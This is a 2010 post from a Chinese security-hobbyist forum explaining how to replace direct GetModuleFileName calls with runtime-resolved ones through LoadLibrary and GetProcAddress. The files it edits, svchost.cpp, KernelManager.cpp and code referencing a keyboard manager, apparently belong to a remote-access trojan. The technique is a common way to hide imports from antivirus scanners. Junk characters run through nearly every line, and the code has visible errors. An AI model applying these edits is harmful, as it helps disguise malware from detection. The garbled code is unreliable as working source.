Board logo

标题: [原创文章] 全局动态调用 [打印本页]
作者: ice_xke    时间: 2010-10-19 12:30     标题: 全局动态调用

全局动态调用笔记
; f! b  D) Y# c% p$ |svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
# i! h; V) B0 u0 I7 L: A; v) h----------------------------------------
2 m# c6 S/ N1 \/ R0 ?( P, qDTDY.h:
2 |1 N* A- o3 d- o+ Y1 i. w, |3 j5 [+ O/ R/ ?! h. J
#if _MSC_VER>1000" E) T1 W6 y4 N: h
#pragma once) {2 e% {4 \" s9 }5 b
#endif //_MSC_VER>1000
2 v4 L- r1 H- Q/ b1 g# U! b8 R#include<windows.h>
- M% s# l/ P& d6 j# c" t% t' c7 L6 M2 M& X+ _; e- m- D  ?
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
, G' U* w- u4 D; a+ Z. Lclass DTDY2 ^9 S0 v( ]7 r, Y$ E$ t7 l3 P
{
+ A: o! n- u. R1 V/ w6 u# {$ {9 ^public:% p# ?1 P: \- m1 T- R
DTDY();8 e# U( \) n0 ?( F: A6 T
virtual ~DTDY();  K8 e' Z) B4 |
public:
4 A  d& K, H) ^) M  h& Kstatic pGetModuleFileNameA MyGetModuleFileName;! |" |% R" P% x7 [4 u; o6 ^
static BOOL FunInitiallization();
0 t" W. g& j) V};
$ h5 R) N( ^8 B( k  X#endif! y; K3 z' X3 K/ y  V
----------------------------------------" D/ e3 A4 J- R, ^* l8 I9 H  n

# ~7 i9 r# ]: H" Z* y" [, K1 FDTDY.cpp:
: s. e) d  `* Y1 o/ V5 C6 F. k
- Q( X0 N* `* X7 o5 v6 ^#include "DTDY.h"
" F$ |# ]5 y& o, }3 g" BpGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;# {# R, q( F& w6 b2 S
DTDY:TDY()
9 O. e+ Z* q, }3 a, u{
5 S$ v' y+ r( X; g}1 ?  U- o0 D1 D7 c) |5 e
DTDY::~DTDY()
: r4 f3 S2 s' P7 R! h/ w6 l# O" a2 m{
3 t0 K0 |: q& e3 `' s' U}
5 n' I6 _! z2 R7 B9 u  J2 KBOOL DTDY::FunInitiallization()8 B( u4 z7 T- {5 @3 u% u; z9 D
{. w; }) ]& N9 ~9 w
HMODULE hModule=LoadLibrary("kernel32.dll");
) L! ?2 g) K# U) ?4 L( mMyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
4 U5 N7 B8 Y! s- n. j: H4 Zif(!MyGetModuleFileName=) return FALSE;/ k7 ~# U2 d7 V" _, x& h$ T
) `" ]% L; r9 }
return TRUE;
2 ]/ z5 p9 _# ?8 f" s& w; [}
3 w$ f/ q  v4 M$ H----------------------------------------
1 C% H1 W  d, Osvchost.cpp:
8 Y) Z$ P; v% w6 D
+ |% r- u& v) Z/ R#include "DTDY.h"
( r. D) F. U  T7 k3 {
. b) V4 d1 q/ C* GBOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved), q* f& ?, k$ }* y1 o
{: t: R. Z, ~4 w8 o7 W) [
switch(ul_reason_for_call)
. T" O% Q( N4 a- `$ `% u{' _& x- x; a* l- @2 G# U
case DLL_PROCESS_ATTACH:9 W- p2 p" G: |( E
if(!DTDY::FunInitiallization()) return FALSE;  i0 C7 P$ O  u' Z
9 f) t4 v/ e; A; l
break;, R1 H0 E$ @! u2 O
}9 p0 Y8 }& P$ h
}  d- [+ b) B% ]

0 B3 ?' m7 N# Y! x, ]" \/ T9 l: u6 n3 T) f% z, L
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
. a: k! v+ q3 @8 a$ V/ H+ J& X2 W: n改写为5 y, [- v( \& S5 Y$ [' w
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));2 @6 c1 K+ W% _: A
----------------------------------------  @+ ], J4 S) Y  {& [1 K# j
KernelManager.cpp:4 J% L1 T9 Y- N. C# v- Z/ A. N

* h8 N" k3 ?9 k, P#include "../DTDY.h"
% N$ D7 p1 d2 VGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));7 q% y8 a# H; _, u0 ?! n
改写为# O2 v' F- @4 R% e0 t' a; ~. u2 s
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));+ j  N! Q! _" A
----------------------------------------



欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2